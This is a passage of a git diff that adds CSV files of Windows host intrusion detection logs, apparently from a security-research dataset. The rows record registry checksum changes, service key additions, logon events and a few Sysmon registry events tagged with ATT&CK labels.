'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BcastDVRUserService_30ad3\Security' was added. +" +"Apr 4, 2020 @ 15:13:57.406",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-90-0-2' checksum changed. 
+Old md5sum was: '60dd34472b7c4b4733f08655c4f60df2' +New md5sum is : 'cc131ed9046fdc4473415eda7dfda2bd' +Old sha1sum was: '525a1f729b820c37784c2e975a559deaf184ebb7' +New sha1sum is : '9384caab289e45a45d742e5aa407d878d3097b5a' +" +"Apr 4, 2020 @ 15:13:57.385",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-90-0-1' checksum changed. +Old md5sum was: '88ea2896fe72770dace71b6eb0b8a2fd' +New md5sum is : '34d7c82c5e420ab011490952e3ec24d9' +Old sha1sum was: 'c51f16862ebfdc584506948cb5fc58dc3b840250' +New sha1sum is : '88ab8d62bed217dca932dc4cb700cedfda2782c0' +" +"Apr 4, 2020 @ 15:13:57.344",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. +Old md5sum was: '1709748d460224dc74cfac547f6865bb' +New md5sum is : 'f99554cc3af126a43609b522296e3789' +Old sha1sum was: 'cac1e2f09b9f58972eabcf46abf587b99bb5b90a' +New sha1sum is : '79e65a0a0aa4ac842cd2db7310b55b8ce48384cf' +" +"Apr 4, 2020 @ 15:13:57.328",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-21-438079597-2123118846-2669748851-1000' checksum changed. +Old md5sum was: '21c20e9307ad43dbf66b7a80761f0ae8' +New md5sum is : '3de12a32ccbd37717a2ea08417d7fddc' +Old sha1sum was: '9f188f582f1b626cd2abfc5045f67af326f52d7b' +New sha1sum is : 'b7451a316325cba8f20dce525a6e35a14bc91803' +" +"Apr 4, 2020 @ 15:13:57.312",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-18' checksum changed. 
+Old md5sum was: '5984c3fa0a124d5fa7330bf624e22205' +New md5sum is : '519c95147a332fa984f21fa352a3e6fd' +Old sha1sum was: '3fa0436b0a2334ea9bf571212d8058534fad696b' +New sha1sum is : '22be62c29307035d650978bc7ed1fcc26546a41e' +" +"Apr 4, 2020 @ 15:13:52.854",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\AarSvc_30ad3' was added. +" +"Apr 4, 2020 @ 15:13:52.812",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\AarSvc_30ad3\Security' was added. +" diff --git a/data/MW_3_HIDS_2.csv b/data/MW_3_HIDS_2.csv new file mode 100644 index 0000000..3f595a1 --- /dev/null +++ b/data/MW_3_HIDS_2.csv 
@@ -0,0 +1,1555 @@ +timestamp,"rule.level","rule.description","full_log","data.win.system.message" +"Apr 24, 2020 @ 12:53:49.260",5,"SCA summary: Benchmark for Windows audit: Score less than 80% (68)",, +"Apr 24, 2020 @ 12:53:46.185",5,"Benchmark for Windows audit: Ensure 'MSS: (AutoAdminLogon) Enable Automatic Logon (not recommended)' is set to 'Disabled': Status changed from failed to 'not applicable'",, +"Apr 24, 2020 @ 12:53:26.563",3,"Service startup type was changed",,"""The start type of the Windows Modules Installer service was changed from auto start to demand start.""" +"Apr 24, 2020 @ 12:52:55.063",7,"Integrity checksum changed.","File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Active Setup\Installed Components\{8A69D345-D564-463c-AFF1-A69D9E530F96}' checksum changed. +Old md5sum was: '271f59daf9ca28fbeb0bd234897e1662' +New md5sum is : '1af7f0914012f801bdabc07119bd84db' +Old sha1sum was: 'e8d6ecabf76ed97cd87dc8593f64cd69ec8ec7a2' +New sha1sum is : '98d0a499a8ec59bdfd79d0750a971a939fa5e3a2' +", +"Apr 24, 2020 @ 12:52:52.018",7,"Integrity checksum changed.","File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon' checksum changed. +Old md5sum was: '47f9a8fc035cc80b23dfd8be4d23cda6' +New md5sum is : 'ae65b80d3aa8d32f38dfcf0fd6c6b1b0' +Old sha1sum was: '592c18db00c7cbd34e9537e069e1bf1ae084bc9d' +New sha1sum is : 'bab24ad7745b947cdd2101c926f3699e6f6cbe15' +", +"Apr 24, 2020 @ 12:52:52.006",7,"Integrity checksum changed.","File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\VolatileUserMgrKey\1\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. 
+Old md5sum was: '480a7b1436febced63b663e198db057e' +New md5sum is : '6484aaf5ea7798f1bf32f0804fa1d0bb' +Old sha1sum was: 'a366c53c7d877bd13ac0386830dbad1b52127af9' +New sha1sum is : 'fc8cbbf8be08cb003f070ba6949ee1944ad70d2d' +", +"Apr 24, 2020 @ 12:52:47.703",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\WpnUserService_3eb7b' was added. +", +"Apr 24, 2020 @ 12:52:47.672",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\WpnUserService_3eb7b\Security' was added. +", +"Apr 24, 2020 @ 12:52:46.672",3,"Windows Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x24c + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). 
+ +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 24, 2020 @ 12:52:46.622",3,"Windows Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x24c + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. 
+ +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 24, 2020 @ 12:52:39.718",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\TimeProviders\NtpClient' checksum changed. +Old md5sum was: 'f7ede040f0bd50f2432cce9ba9720243' +New md5sum is : '5de781a93c0a6c5d5144068810a7e1b5' +Old sha1sum was: '01b3e39aa29d8c3fccfcaa1089c2a0890d3baaae' +New sha1sum is : '09d2f3723a2d55175f72d45ef9f690a25bbba0c6' +", +"Apr 24, 2020 @ 12:52:39.687",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits' checksum changed. 
+Old md5sum was: 'fc7a35e4b9cb3f1aa594dae63bcb0752' +New md5sum is : '5400df8343e80773e4544cae1af1ce7d' +Old sha1sum was: '4428ae482d529a552955f4521ecc3337d5001df3' +New sha1sum is : 'ca45b55044bf31055c2a8596696e6d8e80b45a26' +", +"Apr 24, 2020 @ 12:52:39.671",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime' checksum changed. +Old md5sum was: '3bed6b4b8101da842bb6afe04a8271c2' +New md5sum is : '3a5e7eeb22ae3b1256b5902f59ae2551' +Old sha1sum was: '6bcfa900864cb27898f9c3bf26b53fb3b0eb9d2c' +New sha1sum is : 'a526904a4da107a226b5f13e8a032015923e3231' +", +"Apr 24, 2020 @ 12:52:38.908",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\VSS\Diag\VolSnap' checksum changed. +Old md5sum was: '7b25497674cc671619a3e52c5a6b72e8' +New md5sum is : 'ee77ddbee1ed560d6b349650e8349414' +Old sha1sum was: 'c42697f1b7d2dcbd8290e433e4dc2ca12090701a' +New sha1sum is : '6c5f559746b6a7a4faf287183a528aa3790a9772' +", +"Apr 24, 2020 @ 12:52:37.185",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Vid\Parameters\Wdf' checksum changed. +Old md5sum was: 'acae9dc748745942263a86d7eb614be0' +New md5sum is : '2e0f79c6fb4ff452e85cbf1a2d6ffc09' +Old sha1sum was: '426e630d1ce4b54eb126567e177155a4f7a507fa' +New sha1sum is : 'e00d4f56a725e171cace53875e2cb589d9ba1aaa' +", +"Apr 24, 2020 @ 12:52:36.899",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\vdrvroot\Parameters\Wdf' checksum changed. +Old md5sum was: '73ff3da5b491b534e4f1fca73d797712' +New md5sum is : 'bd63601b6f69031fc9053f7f5e9994b3' +Old sha1sum was: '4f491ce1ca6fff4e44240d89175bfd01ac0bfaf4' +New sha1sum is : '8919a69432dd58f4818fdb4b7f15495900ea20ed' +", +"Apr 24, 2020 @ 12:52:36.624",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UserDataSvc_3eb7b' was added. 
+", +"Apr 24, 2020 @ 12:52:36.608",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UserDataSvc_3eb7b\Security' was added. +", +"Apr 24, 2020 @ 12:52:36.047",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\USBXHCI\Parameters\Wdf' checksum changed. +Old md5sum was: 'd73c739d94aff99e2de6c480608f2631' +New md5sum is : 'aca2086634cad666bcfa5ce02c60723b' +Old sha1sum was: 'e68a929ae8dc2dda3351cb8777f4c6a4351c08c7' +New sha1sum is : '01964f5117f31b451d06a4b44965af64482e8693' +", +"Apr 24, 2020 @ 12:52:35.874",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\USBHUB3\Parameters\Wdf' checksum changed. +Old md5sum was: '057b39f9a279a74ae6e39c10634a6eab' +New md5sum is : '671fdf6ae1d3621c0a477079b6ab0354' +Old sha1sum was: 'd9be4838d8b27777b7d1f01677d6ae2e41541245' +New sha1sum is : '14ea7fe43e6e733427540b1d51575677cb5e4c70' +", +"Apr 24, 2020 @ 12:52:35.439",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UnistoreSvc_3eb7b' was added. +", +"Apr 24, 2020 @ 12:52:35.407",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UnistoreSvc_3eb7b\Security' was added. +", +"Apr 24, 2020 @ 12:52:35.234",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\umbus\Parameters\Wdf' checksum changed. +Old md5sum was: 'acae9dc748745942263a86d7eb614be0' +New md5sum is : '2e0f79c6fb4ff452e85cbf1a2d6ffc09' +Old sha1sum was: '426e630d1ce4b54eb126567e177155a4f7a507fa' +New sha1sum is : 'e00d4f56a725e171cace53875e2cb589d9ba1aaa' +", +"Apr 24, 2020 @ 12:52:34.093",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\TrustedInstaller' checksum changed. 
+Old md5sum was: 'f5ea91602eb594fc2b4973f59a513fcb' +New md5sum is : '06f5c6f330af834dd08ce904d9ae7cc8' +Old sha1sum was: '7d45a8c18f8a7d6091a33c6ba0252b375312ca0c' +New sha1sum is : '0cf4c4c19a1201e41b9deba273320298f4f97b50' +", +"Apr 24, 2020 @ 12:52:32.766",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{10cb9356-9dd8-4d03-959f-611e879a11a6}' checksum changed. +Old md5sum was: 'ae5aeacd0ec096e337ca3ae6a707a5ef' +New md5sum is : '5b5e36f557a71edd65caa6a11cda9191' +Old sha1sum was: 'cc73062438c2d276ae920c586c61e8046d7af96f' +New sha1sum is : '0763b6960462085ba4b95f8dd74de49818cad40f' +", +"Apr 24, 2020 @ 12:52:27.249",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\srvnet\Parameters' checksum changed. +Old md5sum was: '3d3a643354245020081ae89e531e5f43' +New md5sum is : 'b7992042185fc6ec85e366e31893c993' +Old sha1sum was: '388ea0001ce3a9c23720ba87edb0e1b1510b7b4e' +New sha1sum is : '7da8cd2c012f8b55d1d5ce23f9ccdf45379c55ad' +", +"Apr 24, 2020 @ 12:52:24.906",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules' checksum changed. +Old md5sum was: '5689c2dd6ed61a04cc389b6099c0aea5' +New md5sum is : '6fba24441f7c19e08b81d5840e9e62af' +Old sha1sum was: '64932df77c40a56e97edb3553ce359b3aaff132e' +New sha1sum is : '915cf0aee85628bc7ab27c3b65968f0090fc5e9a' +", +"Apr 24, 2020 @ 12:52:24.812",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Epoch2' checksum changed. 
+Old md5sum was: '5de0ef21cee3c7b87f2fab30b8b06e2e' +New md5sum is : 'dc9f9e3fba782230828c1350ebdd6327' +Old sha1sum was: '95450da791d27d0a0e456663988211c24b30dbec' +New sha1sum is : 'df82c4e7b328c25ab2a829fbb36079904d347a00' +", +"Apr 24, 2020 @ 12:52:24.781",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Epoch' checksum changed. +Old md5sum was: 'f93cf0221c7bffcbf0606d9f193a943e' +New md5sum is : '0447d0d52ee5a830c05fbee07043f258' +Old sha1sum was: '098e4d9f53900d4e8394afe508e54240c78b74ad' +New sha1sum is : 'c52421ca8edc9b41a95e22c437b67f0f199f288a' +", +"Apr 24, 2020 @ 12:52:21.346",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T12:52:17.711195500Z"",""eventRecordID"":""984"",""processID"":""2204"",""threadID"":""3084"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 12:52:17.702\r\nProcessGuid: {df9fc3d3-e062-5ea2-0000-001053a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\GoogleChromeElevationService\\ImagePath\r\nDetails: \""C:\\Program Files (x86)\\Google\\Chrome\\Application\\81.0.4044.122\\elevation_service.exe\""\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 
12:52:17.702"",""processGuid"":""{df9fc3d3-e062-5ea2-0000-001053a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\GoogleChromeElevationService\\\\ImagePath"",""details"":""\\\""C:\\\\Program Files (x86)\\\\Google\\\\Chrome\\\\Application\\\\81.0.4044.122\\\\elevation_service.exe\\\""""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 12:52:17.702 +ProcessGuid: {df9fc3d3-e062-5ea2-0000-001053a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\GoogleChromeElevationService\ImagePath +Details: ""C:\Program Files (x86)\Google\Chrome\Application\81.0.4044.122\elevation_service.exe""""" +"Apr 24, 2020 @ 12:52:21.326",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T12:52:17.710283000Z"",""eventRecordID"":""983"",""processID"":""2204"",""threadID"":""3084"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 12:52:17.702\r\nProcessGuid: {df9fc3d3-e062-5ea2-0000-001053a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\GoogleChromeElevationService\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 
12:52:17.702"",""processGuid"":""{df9fc3d3-e062-5ea2-0000-001053a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\GoogleChromeElevationService\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 12:52:17.702 +ProcessGuid: {df9fc3d3-e062-5ea2-0000-001053a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\GoogleChromeElevationService\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 12:52:19.044",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\rdyboost\Diagnostics' checksum changed. +Old md5sum was: 'b94f00fb649e58278413ddb218687776' +New md5sum is : 'fa742e572a0ab3ad838cdc36f548a2e7' +Old sha1sum was: '4e632334dcf3fb5f87a71c66694dd9a1eb5fdbc7' +New sha1sum is : '4bd92b98f3142283ddbfa0b8875cc0e446f8a651' +", +"Apr 24, 2020 @ 12:52:16.828",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PrintWorkflowUserSvc_3eb7b' was added. +", +"Apr 24, 2020 @ 12:52:16.812",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PrintWorkflowUserSvc_3eb7b\Security' was added. +", +"Apr 24, 2020 @ 12:52:16.376",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_3eb7b' was added. +", +"Apr 24, 2020 @ 12:52:16.359",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_3eb7b\Security' was added. +", +"Apr 24, 2020 @ 12:52:16.171",3,"Software Protection service scheduled successfully",,"""Successfully scheduled Software Protection service for re-start at 2020-04-25T12:49:13Z. 
Reason: RulesEngine.""" +"Apr 24, 2020 @ 12:52:14.499",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\OneSyncSvc_3eb7b' was added. +", +"Apr 24, 2020 @ 12:52:14.468",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\OneSyncSvc_3eb7b\Security' was added. +", +"Apr 24, 2020 @ 12:52:13.985",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\NlaSvc\Parameters\Cache' checksum changed. +Old md5sum was: '774e15e7baf44381d722db864ab890d7' +New md5sum is : '50e564d651df4ed3711c530cb99d635a' +Old sha1sum was: '469daffaef7546bd68eba730d238e5592de9f468' +New sha1sum is : '9f85b67a6c52e8312f838e2577ad0927a069eeda' +", +"Apr 24, 2020 @ 12:52:11.921",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\NdisVirtualBus\Parameters\Wdf' checksum changed. +Old md5sum was: '5727fcd23252b0e1550791766fd7e652' +New md5sum is : 'fb276bc3254926295315efd699a5f0ce' +Old sha1sum was: '1a0a4badb9ef02d3f518064090d622844165b266' +New sha1sum is : 'b7489e940ba2819e44a06f3b6c370f25b1bd5a26' +", +"Apr 24, 2020 @ 12:52:08.092",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\msisadrv\Parameters\Wdf' checksum changed. +Old md5sum was: '71d14a2d2a756124273e36b0738f8bba' +New md5sum is : '38693b218d0d1cfbe8aa44b2759f5e0a' +Old sha1sum was: 'c605e5d23f62dcaf8235115a11a8363912e96ea2' +New sha1sum is : '7e71bd80049f0a54f2ff10b576253aee0f92597e' +", +"Apr 24, 2020 @ 12:52:07.000",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\monitor\Parameters\Wdf' checksum changed. 
+Old md5sum was: 'b4bce65b22aa4a519547960a719662c4' +New md5sum is : 'f7ff7d512129b2231c517bc98c61895a' +Old sha1sum was: '3dac9d974e4d5d554b03c5e46ca8acc22b4826b6' +New sha1sum is : '8ad4b6c00e384185ef05b860966037e851115017' +", +"Apr 24, 2020 @ 12:52:06.866",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\MessagingService_3eb7b' was added. +", +"Apr 24, 2020 @ 12:52:06.851",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\MessagingService_3eb7b\TriggerInfo\0' was added. +", +"Apr 24, 2020 @ 12:52:06.827",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\MessagingService_3eb7b\Security' was added. +", +"Apr 24, 2020 @ 12:52:02.343",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\LanmanServer\Parameters' checksum changed. +Old md5sum was: 'df3256a25e140f891367ef4f45e45db2' +New md5sum is : 'b85132a0856accdaadf483c328604620' +Old sha1sum was: 'e2d4eee52f1f6550a2d64d496dfa6aa49e9a8351' +New sha1sum is : '80153a47c9a0dbd7178a3eb90d1718ccd39c8805' +", +"Apr 24, 2020 @ 12:52:00.820",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\intelppm\Parameters\Wdf' checksum changed. +Old md5sum was: '5727fcd23252b0e1550791766fd7e652' +New md5sum is : '1de56df874baf63b698941817624f3e7' +Old sha1sum was: '1a0a4badb9ef02d3f518064090d622844165b266' +New sha1sum is : '5bae7edca7bfded5a62882384016c3e950aa6ada' +", +"Apr 24, 2020 @ 12:51:57.735",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\HDAudBus\Parameters\Wdf' checksum changed. 
+Old md5sum was: '1f47b7195d8fed9969326bd01db47d06' +New md5sum is : '549d5493f97506ca14eb416c7cc49e4d' +Old sha1sum was: 'ee63ae916c97b341f744e3bde4a840cc48ac014b' +New sha1sum is : '48103930a75d17911b2f04f0163afdbadea50b74' +", +"Apr 24, 2020 @ 12:51:56.999",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\gencounter\Parameters\Wdf' checksum changed. +Old md5sum was: '5727fcd23252b0e1550791766fd7e652' +New md5sum is : '1de56df874baf63b698941817624f3e7' +Old sha1sum was: '1a0a4badb9ef02d3f518064090d622844165b266' +New sha1sum is : '5bae7edca7bfded5a62882384016c3e950aa6ada' +", +"Apr 24, 2020 @ 12:51:55.874",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\FDResPub\ServiceData' checksum changed. +Old md5sum was: '8babdce3ab05d3473a80df927d06237f' +New md5sum is : 'ae9643074ec7a4ef81bb63a482e527c9' +Old sha1sum was: 'e353e522c03a6a1e27f132fba0a42bb0a83e4bf3' +New sha1sum is : 'bb90e1460f2a74046f7b573529a69b9faa6b3a52' +", +"Apr 24, 2020 @ 12:51:46.999",3,"Windows Logon Success",,"""An account was successfully logged on. 
+ +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x24c + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. 
+ - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 24, 2020 @ 12:51:46.874",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\EventLog\State' checksum changed. +Old md5sum was: '8ef26438ac25bee10003522daa8b4a2f' +New md5sum is : '82b30eaa417a603e1be4cf6a8e7d1780' +Old sha1sum was: 'b211ed5eee8285bb054c42335a4a0a9b2c9385b0' +New sha1sum is : '06cff1d46c183923be141be79d7942caf890168a' +", +"Apr 24, 2020 @ 12:51:40.630",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Dnscache\Parameters\Probe\{a957488a-bcc3-4136-8332-2c86058caa77}' checksum changed. +Old md5sum was: '0ec8c5bab58c4b05da4b48fa2c3bf9b5' +New md5sum is : '0f373677e8420ba91bd16d2b118fd873' +Old sha1sum was: '453d1c5c9c77e01007afa63ba0bb33db3da2ef96' +New sha1sum is : '7cfdcf480a3cb8adf138d3f5deabf3f648b63dee' +", +"Apr 24, 2020 @ 12:51:39.202",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicesFlowUserSvc_3eb7b' was added. +", +"Apr 24, 2020 @ 12:51:39.186",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicesFlowUserSvc_3eb7b\Security' was added. 